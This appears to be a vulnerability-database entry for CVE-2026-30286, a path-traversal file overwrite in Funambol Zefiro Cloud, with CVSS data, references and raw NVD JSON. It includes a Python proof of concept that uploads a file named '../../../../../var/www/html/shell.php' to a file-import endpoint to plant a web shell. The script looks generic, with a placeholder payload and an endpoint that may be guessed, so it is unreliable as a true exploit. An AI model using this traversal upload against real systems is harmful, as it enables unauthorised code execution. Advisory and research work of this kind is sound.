CVE-2026-30286

Description

An arbitrary file overwrite vulnerability in Funambol, Inc. Zefiro Cloud v32.0.2026011614 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:funambol:zefiro:32.0.2026011614:*:*:*:*:*:*:* - VULNERABLE

Funambol Zefiro Cloud v32.0.2026011614

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit(target_url):
    """
    PoC for CVE-2026-30286: Arbitrary File Overwrite via File Import
    This script attempts to upload a file to a sensitive path.
    """
    # The vulnerable endpoint for file import
    upload_url = f"{target_url}/api/file_import"
    
    # Malicious content to be written to the server
    data = "MALICIOUS_CODE_CONTENT"
    
    # Constructing a filename with path traversal to overwrite a critical file
    # Example: Overwriting a configuration file or script
    files = {
        'file': ('../../../../../var/www/html/shell.php', data, 'text/plain')
    }
    
    try:
        response = requests.post(upload_url, files=files, timeout=10)
        if response.status_code == 200:
            print("[+] Exploit successful! File potentially overwritten.")
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://vulnerable-target:port"
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30286
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30286
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30286/
[4] VulDB https://vuldb.com/cve/CVE-2026-30286
[5] https://github.com/Secsys-FDU/AF_CVEs/issues/14
[6] https://play.google.com/store/apps/details?id=com.funambol.zefiro
[7] https://secsys.fudan.edu.cn/
[8] https://zefiro.me/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30286", "sourceIdentifier": "[email protected]", "published": "2026-03-31T18:16:47.433", "lastModified": "2026-04-03T18:26:13.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in Funambol, Inc. Zefiro Cloud v32.0.2026011614 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:funambol:zefiro:32.0.2026011614:*:*:*:*:*:*:*", "matchCriteriaId": "576C1CBB-969A-419F-B2B1-22C6755F70C4"}]}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/14", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://play.google.com/store/apps/details?id=com.funambol.zefiro", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://zefiro.me/", "source": "[email protected]", "tags": ["Product"]}]}}